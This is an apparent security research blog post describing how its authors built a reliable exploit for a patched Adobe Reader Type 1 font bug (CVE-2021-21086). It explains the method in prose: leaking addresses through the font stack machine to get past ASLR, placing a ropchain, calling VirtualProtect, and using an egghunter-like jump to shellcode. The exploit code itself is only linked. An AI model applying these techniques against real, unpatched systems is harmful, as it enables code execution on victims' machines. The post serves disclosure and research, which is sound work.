Who needs JS when you’ve got Turing complete fonts?

The road to successfully exploit Adobe Reader using a font

Octavio Gianatiempo
Faraday
9 min readDec 2, 2021

--

Recently, we gave a talk with Javier Aguinaga at the 2021 Ekoparty where we showed an exploit for Adobe Reader. The exploit uses a bug reported in the stack machine that parses Type 1 fonts to gain code execution in the context of the rendering process. We made this process 100% reliable by taking advantage of this stack machine. This is what this post explains. Let’s start talking a bit about Type 1 fonts.

Font programs & charstrings

Adobe Type 1 Font format was developed in the ´80s and uses a subset of the PostScript language to define curves and hints that allow rasterizing fonts. It was originally a proprietary format, but Adobe released the specification and shared the code with other vendors to promote its adoption. Because of this, Type 1 fonts are natively supported by operating systems such as Mac OS and Windows in addition to several Adobe products and other third-party products that are compatible with Adobe’s formats. The presence of parsers for this format in multiple platforms in conjunction with the complexity and age of the code makes it a great target for finding and exploiting bugs. In this format specification, a font program contains several dictionaries that define various aspects of a font. Each character (glyph) is represented by a charstring, which is bytecode that will be interpreted by a stack machine in order to render it. All the charstrings that compose a font are defined in the charstrings dictionary.

Organization of a Type 1 font program (Modified from: Adobe Type 1 Font Format, Adobe Systems Inc.)

The stack machine

In Adobe’s products, the stack machine that interprets Type 1 font bytecode is located in Cooltype.dll and it also supports newer versions of this format. This machine has two main components: an operand stack (opstack) that is used to pass arguments and receive the results of the different operations, and a transient array that acts as a random access memory to store information. While the operand stack was always part of the specification, the transient array was added in the Type 2 version of this font format. Interestingly, the operand stack is implemented as a fixed size array and is located in the stack of the interpreter function. The transient array, in contrast, resides in dynamic memory.

Diagram of the memory while the stack machine executes 4022250974 8 put. The boxes on top represent the transient array, and the boxes below represent the operand stack, which is located in the function’s stack above the return address.

How does this machine work? Let’s take put operation as an example. It moves a value to a particular index of the transient array. The bytecode for this machine uses postfix notation, this means that operands precede operations. So, if you want to write 0xDEADBEEF on the eighth position of the transient array, you have to send 0xDEADBEEF 0x8 put. Numbers have various encodings in this format but let’s ignore that for simplicity.

On the left, you can see a representation of the memory while the machine executes this bytecode. It starts by pushing each number to the operand stack moving the opstack pointer forward. Then it executes the putoperation consuming the arguments from the opstack, moving the pointer backward and moving 0xDEADBEEF to the eighth position of the transient array.

Checking the operand stack limits

Most charstring operations check that the opstack pointer won’t be moved outside the opstack limits by their execution. But assume that the pointer is inside the opstack to begin with and only check “one side”. For example, a number can only be pushed if the opstack pointer is located before the end of the opstack (i.e. only checks the upper bound). So if a bug moves the pointer before the beginning of the opstack, numbers can be pushed to memory outside the opstack. In other cases, elements can be written or read from the transient array only if the opstack pointer is after the beginning of the stack and there are enough arguments pushed (i.e only checks the lower bound). So if a bug moves the pointer after the end of the opstack, numbers can be written or read from the transient array into memory. This is especially relevant for exploitation because in this direction the return address can be found.

CVE-2021–21086 (patched on February 09, 2021)

Recently, a bug that allowed arbitrary stack manipulation was reported by Mateusz Jurczyk (a.k.a. j00ru) of Google Project Zero. This researcher made in 2005 an in-depth series of posts describing similar older bugs alongside various details of the inner workings of this library. The new bug is in the code for the callOtherSubr operation. This operation calls subroutines that can be user-defined or predefined. A subset of the predefined subroutines fails to check the opstack bounds, allowing to move the opstack pointer out of the opstack. On February 09, 2021, a patch for Adobe Reader was released to fix several vulnerabilities including this new CoolType vulnerability (CVE-2021–21086).

Proof of concept

Diagram of the function’s stack while the machine executes J00ru’s POC.

Alongside the bug report, j00ru presented a POC that uses the predefined subroutine no. 18 to move the opstack pointer outside the opstack limits towards the return address. This POC illustrates a valid strategy to write outside the operand stack but it has a side-effect: it writes 0x120000 each time it advances the pointer (because this is the internal representation for the number 18 that is used as an argument for callOtherSubrto call this subroutine). Note that each call to the subroutine advances the pointer by a fixed amount. When the pointer reaches the return address, j00ru’s code overwrites it with 0x41414141. To do this it uses the get operation that works after the opstack end because of the one-sided bound checks. When the charstring interpreter function returns, Adobe Reader crashes with EIP = 0x41414141.

Exploitation

We were surprised that there was no exploit available for this bug considering that the POC grants control of the function stack. So we decided to write one ourselves and in the process found several difficulties that hindered the exploitation. However, this stack machine is very powerful and we managed to abuse it to build a 100% reliable exploit after overcoming these difficulties. If you want to take a deep dive into our solutions for these problems keep on reading. Otherwise, you can skip the following section and check the code and the video of the working exploit below.

The road to exploitation

Thanks to the POC we knew how to overwrite the return address. So we could have just overwritten it with a ropchain and game over... Well, this is easier said than done because several problems arise when you try to do this:

Deafeating ASLR

Diagram of the function’s stack while the machine executes the exploit leaking the return address.

Address space layout randomization (ASLR) is a protection that operating systems implement to make exploitation of memory corruption bugs harder. It randomizes the location where executables are loaded into memory and thus changes the address of gadgets at runtime. However, the relative position of the gadgets with respect to other features of the executable remains constant. In consequence, if you manage to leak an address at runtime then you can calculate the actual address of every gadget.

This is probably the most interesting part of the exploit. Since the Type 1 interpreter is Turing complete, we used the machine’s own operations to calculate the address of each gadget at runtime. Instead of using get to overwrite the return address as j00ru did in the POC, we used the put operation and saved the return address to the transient array. Then we returned the opstack pointer inside the opstack, performed all the calculations to build the ropchain, and saved it in the transient array. Now we can move to the next step, writing this ropchain over the return address.

0x120000 side-effect

Diagram of the function’s stack while the machine executes the exploit writing the ropchain.

As mentioned before, each time we use the bug in callOtherSubr to advance the opstack pointer by a fixed amount we must write the subroutine number in the stack. So if we tried to write some gadgets and then advanced the pointer to write more, one of the first gadgets would end overwritten with 0x120000. This was easy to overcome, just land the ropchain backwards and you are good to face the next challenge down the exploitation road. But again, this is easier said than coded in bytecode for the stack machine! So at this point, we stopped writing bytecode and continued developing the strategies for the exploit to work in a debugger just to see if our goal was possible.

Previous function’s local variables

Diagram of the function’s stack while the machine executes the exploit jumping to the shellcode. Note the location of the charstring pointer.

The next problem we faced was that there isn’t much space to write gadgets after the return address. There are local variables defined in the context of the previous function that are used by the charstring interpreter function on its way out. These are probably pointers to objects passed by reference and they make the program crash if they get overwritten.

Our approach, in this case, was to jump from the last gadget to a shellcode that we positioned at the end of the charstring interpreter’s stack frame. For this to work, we used the ropchain to enable execution on the stack before the jump by calling VirtualProtect.

Limited space for shellcode

It turned out that the space in the charstring interpreter’s stack frame is also limited. There are local variables that once again make the program crash if they get overwritten. Luckily, among these local variables, there’s a pointer to the charstring buffer (shown in the previous diagram) and this buffer can hold 63 kb. So we used an egghunter-like approach. We added 0xDEADBEEF (our egg) at the end of the bytecode and then appended the last stage of the exploit. This allows to jump to this last shellcode independently of the charstring length by searching for the egg in memory. In our case, this last shellcode pops a calc but it can be modified to do anything because the available space is not a problem anymore.

Charstring content for the egghunter-like approach.

Charstring complexity

At this point we had developed strategies to solve all the challenges that arose, technically allowing us to inject and execute any shellcode in the context of the rendering process of the reader. But the last challenge remained unsolved, how to chain all these solutions into a charstring. Remember that for this exploit to work we have to code all this in bytecode for the stack machine which parses the fonts and it is very hard to do it manually.

To solve this we replicated the behavior of the stack machine in Python which allowed us to predict the effects that executing any charstring has on the stack. Moreover, we used this to automate the process of bytecode generation adding operations to the charstring until certain conditions are met. For example, to move the operand stack pointer until it reaches the desired position:

And more remarkably, this replica of the stack machine allowed us to encapsulate primitives. For example, to copy four dwords from the transient array to any position on the stack:

Working exploit code and video

Exploit code can be found in this repo and down below you can see a video of the exploit in action. Please note that Adobe Reader opens files in a sandboxed renderer process. Code execution is achieved in the context of this process. For demonstration purposes, we disabled this protection.

For more information about Faraday products and our new version, click here

--

--